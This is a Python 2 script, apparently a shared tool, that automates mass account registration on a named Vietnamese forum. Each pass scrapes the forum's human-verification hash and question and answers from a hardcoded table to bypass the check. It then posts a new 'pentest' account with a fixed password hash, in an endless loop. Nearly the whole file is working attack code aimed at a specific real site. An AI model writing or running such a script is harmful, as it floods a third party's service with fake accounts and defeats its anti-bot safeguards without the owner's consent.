vietrapclub.py

1. # -*- coding: utf-8 -*-
2. # Code by parkdream1
3. import sys
4. import urllib
5. import httplib
6. import re
7. import time
8. from random import randrange
9. taikhoan = 0
10. def step1():
11.     global hiddenkey
12.     global traloi
13.     params = urllib.urlencode({'s':'',
14.         'securitytoken': 'guest',
15.         'do': 'register',
16.         'url':'http://vietrapclub.com/register.php',
17.         'month':'',
18.         'day':'',
19.         'year':'',
20.         'who':'adult',
21.         'agree':'1'})
22.        
23.     lenth = len(params)
24.        
25.     headers =  ({"Host": "vietrapclub.com",
26.         "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0",
27.         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
28.         "Accept-Language": "en-US,en;q=0.5",
29.         "Referer": "http://vietrapclub.com/dang-ky.php?agree=Ok",
30.         "Cookie": "PHPSESSID=%s"%sid,
31.         "Connection": "keep-alive",
32.         "Content-type": "application/x-www-form-urlencoded",
33.         "Content-Length": "%s"%lenth})
34.  
35.     conn = httplib.HTTPConnection("vietrapclub.com",80)
36.     conn.request("POST", "/dang-ky.php?do=register", params, headers)
37.     response = conn.getresponse()    
38.     print "Status : %s" % response.status, response.reason
39.     the_page = response.read()
40.     print "[*] Detect Security Code and Security Hash"
41.     key = re.search('name="humanverify\[hash\]" value="(.*)" />',the_page)
42.     question = re.search('<label for="humanverify">(.*)</label>',the_page)
43.     if question:
44.         cauhoi = question.group(1)
45.     else:
46.         print "Detect Security Code Error\nExit"
47.         exit(1)
48.     if key:
49.         hiddenkey = key.group(1)
50.     else:
51.         print "Detect Security Code Error\nExit"
52.         exit(1)
53.     print "Security Code: %s" % cauhoi
54.     print "Security Hash: %s" % hiddenkey
55.     if cauhoi == 'Viết lại từ (VRC) vào ô dưới':
56.         traloi = 'VRC'
57.     elif cauhoi == 'Thủ đô nước việt nam là gì? ( viết chử + không dấu + có cách )':
58.         traloi = 'ha noi'
59.     elif cauhoi == '1+1=? (trả lời bằng chữ)':
60.         traloi = 'hai'
61.     else:
62.         print "Can't ByPass Security Question"
63.     print "[*] Bypass Security Code Ok"
64.     print "Answer is : %s" % (traloi)
65.  
66. def step2():
67.     i = randrange(9999)
68.     user = 'pentest%s' % (i)
69.     email = 'pentest%s@gmail.com' % (i)
70.     c_email = 'pentest%s@gmail.com' % (i)
71.  
72.     print "UserName: %s" % user
73.     print "Email: %s" % email
74.  
75.     params = urllib.urlencode({'s':'',
76.             'securitytoken': 'guest',
77.             'do': 'addmember',
78.             'url':'http://vietrapclub.com/register.php',
79.             'agree':'1',
80.             'password_md5':'1f5d020ac0ce982f5846897871b6b5ec',
81.             'passwordconfirm_md5':'1f5d020ac0ce982f5846897871b6b5ec',
82.             'day':'0',
83.             'month':'0',
84.             'year':'0',
85.             'username':'%s'%(user),
86.             'password':'',
87.             'passwordconfirm':'',
88.             'email':'%s'%(email),
89.             'emailconfirm':'%s'%(c_email),
90.             'humanverify[input]':'%s'%(traloi),
91.             'humanverify[hash]':'%s'%(hiddenkey),
92.             'userfield[field1]':'manh',
93.             'userfield[field1_set]':'1',
94.             'userfield[field6]':'2',
95.             'userfield[field6_set]':'1',
96.             'userfield[field3]':'ha+noi',
97.             'userfield[field3_set]':'1',
98.             'userfield[field4]':'+sinh+vien',
99.             'userfield[field4_set]':'1',
100.             'userfield[field5]':'1',
101.             'userfield[field5_set]':'1',
102.             'referrername':'',
103.             'timezoneoffset':'7',
104.             'dst':'2',
105.             'options[adminemail]':'1'})
106.            
107.     lenth = len(params)
108.        
109.     headers =   ({
110.                     "Host": "vietrapclub.com",
111.                     "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0",
112.                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
113.                     "Accept-Language": "en-US,en;q=0.5",
114.                     "Referer": "http://vietrapclub.com/dang-ky.php?do=register",
115.                     "Cookie": "PHPSESSID=%s"%sid,
116.                     "Connection": "keep-alive",
117.                     "Content-type": "application/x-www-form-urlencoded",
118.                     "Content-Length": "%s"%lenth})
119.     print "[*] Start Register User %s" % user
120.     print "[*] Please Wait ..."
121.     conn = httplib.HTTPConnection("vietrapclub.com",80)
122.     conn.request("POST", "/dang-ky.php?do=addmember", params, headers)
123.     response = conn.getresponse()
124.     print "Status : %s" % response.status, response.reason
125.     print "Registered Successfully User: %s" % user
126.     print "================================================================================"
127.     conn.close()
128. if __name__ == "__main__":
129.     while True:
130.         if len(sys.argv) != 2:
131.             print "Error Argv"
132.             exit(0)
133.         sid = sys.argv[1]
134.         step1()
135.         time.sleep(1)
136.         step2()
137.         taikhoan = taikhoan + 1                
138.         print "[*] Registered %s User\n" % taikhoan
139.         print "================================================================================"
140.         time.sleep(2)